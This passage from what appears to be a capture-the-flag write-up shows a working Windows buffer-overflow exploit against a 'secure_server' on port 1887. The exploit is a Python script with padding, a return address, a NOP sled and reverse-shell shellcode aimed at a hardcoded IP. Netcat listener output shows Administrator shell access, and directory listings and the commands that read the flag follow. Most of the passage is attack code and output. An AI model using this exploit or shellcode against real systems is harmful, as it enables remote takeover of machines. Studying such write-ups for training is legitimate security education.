buf += b"\xcb\xc9\xcf\x5c\x96\xe9\x3a\xa2\xaf\x69\xce\x5b\x54"
buf += b"\x71\xbb\x5e\x10\x35\x50\x13\x09\xd0\x56\x80\x2a\xf1"

Then we will edit our exploit to look like that, note that the secure_server is running in the remote machine at port 1887 so we have to change it also:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
#!/usr/bin/python3
import sys
from time import sleep
import socket

buf =  b""
buf += b"\xb8\x42\x49\xf8\x19\xd9\xed\xd9\x74\x24\xf4\x5d\x29"
buf += b"\xc9\xb1\x52\x83\xed\xfc\x31\x45\x0e\x03\x07\x47\x1a"
buf += b"\xec\x7b\xbf\x58\x0f\x83\x40\x3d\x99\x66\x71\x7d\xfd"
buf += b"\xe3\x22\x4d\x75\xa1\xce\x26\xdb\x51\x44\x4a\xf4\x56"
buf += b"\xed\xe1\x22\x59\xee\x5a\x16\xf8\x6c\xa1\x4b\xda\x4d"
buf += b"\x6a\x9e\x1b\x89\x97\x53\x49\x42\xd3\xc6\x7d\xe7\xa9"
buf += b"\xda\xf6\xbb\x3c\x5b\xeb\x0c\x3e\x4a\xba\x07\x19\x4c"
buf += b"\x3d\xcb\x11\xc5\x25\x08\x1f\x9f\xde\xfa\xeb\x1e\x36"
buf += b"\x33\x13\x8c\x77\xfb\xe6\xcc\xb0\x3c\x19\xbb\xc8\x3e"
buf += b"\xa4\xbc\x0f\x3c\x72\x48\x8b\xe6\xf1\xea\x77\x16\xd5"
buf += b"\x6d\xfc\x14\x92\xfa\x5a\x39\x25\x2e\xd1\x45\xae\xd1"
buf += b"\x35\xcc\xf4\xf5\x91\x94\xaf\x94\x80\x70\x01\xa8\xd2"
buf += b"\xda\xfe\x0c\x99\xf7\xeb\x3c\xc0\x9f\xd8\x0c\xfa\x5f"
buf += b"\x77\x06\x89\x6d\xd8\xbc\x05\xde\x91\x1a\xd2\x21\x88"
buf += b"\xdb\x4c\xdc\x33\x1c\x45\x1b\x67\x4c\xfd\x8a\x08\x07"
buf += b"\xfd\x33\xdd\x88\xad\x9b\x8e\x68\x1d\x5c\x7f\x01\x77"
buf += b"\x53\xa0\x31\x78\xb9\xc9\xd8\x83\x2a\xf5\x92\x2c\xae"
buf += b"\x91\xa8\x32\x82\x5c\x24\xd4\xb6\x8e\x60\x4f\x2f\x36"
buf += b"\x29\x1b\xce\xb7\xe7\x66\xd0\x3c\x04\x97\x9f\xb4\x61"
buf += b"\x8b\x48\x35\x3c\xf1\xdf\x4a\xea\x9d\xbc\xd9\x71\x5d"
buf += b"\xca\xc1\x2d\x0a\x9b\x34\x24\xde\x31\x6e\x9e\xfc\xcb"
buf += b"\xf6\xd9\x44\x10\xcb\xe4\x45\xd5\x77\xc3\x55\x23\x77"
buf += b"\x4f\x01\xfb\x2e\x19\xff\xbd\x98\xeb\xa9\x17\x76\xa2"
buf += b"\x3d\xe1\xb4\x75\x3b\xee\x90\x03\xa3\x5f\x4d\x52\xdc"
buf += b"\x50\x19\x52\xa5\x8c\xb9\x9d\x7c\x15\xd9\x7f\x54\x60"
buf += b"\x72\x26\x3d\xc9\x1f\xd9\xe8\x0e\x26\x5a\x18\xef\xdd"
buf += b"\x42\x69\xea\x9a\xc4\x82\x86\xb3\xa0\xa4\x35\xb3\xe0"

buffer = "A" * 998 + "\xA0\x12\x50\x62" + "\x90" * 40 + buf

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
s.connect(("18.193.129.237", 1887))
s.recv(1024)
s.send(("SECRET"+ buffer + '\r\n'))
s.close()

‌ and We got a reverse shell!

1
2
3
4
5
6
7
8
9
root@kali:~/CyberTalents/Crashed# python exploit-remote.py
root@kali:~# nc -nvlp 9001
listening on [any] 9001 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 43124
Microsoft Windows [Version 10.0.17763.1397]
(c) 2018 Microsoft Corporation. All rights reserved.
c:\Users\Administrator\Desktop>whoami
whoami
ec2amaz-hf7234c\administrator

Flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
C:\Windows\system32>cd c:\Users\Administrator\Desktop 
cd c:\Users\Administrator\Desktop

c:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 3467-4F3A

 Directory of c:\Users\Administrator\Desktop

09/14/2020  10:50 PM    <DIR>          .
09/14/2020  10:50 PM    <DIR>          ..
06/21/2016  03:36 PM               527 EC2 Feedback.website
06/21/2016  03:36 PM               554 EC2 Microsoft Windows Guide.website
09/10/2020  12:35 AM                32 flag.txt
09/10/2020  04:38 PM    <DIR>          snapshot_2020-08-16_04-47
09/10/2020  04:38 PM        32,121,736 snapshot_2020-08-16_04-47.zip
09/14/2020  08:38 AM    <DIR>          vulnserver-master
               4 File(s)     32,122,849 bytes
               4 Dir(s)  16,779,464,704 bytes free

c:\Users\Administrator\Desktop>type flag.txt
type flag.txt
ffa3857489xxxxxxxxx474c9d
This post is licensed under CC BY 4.0 by the author.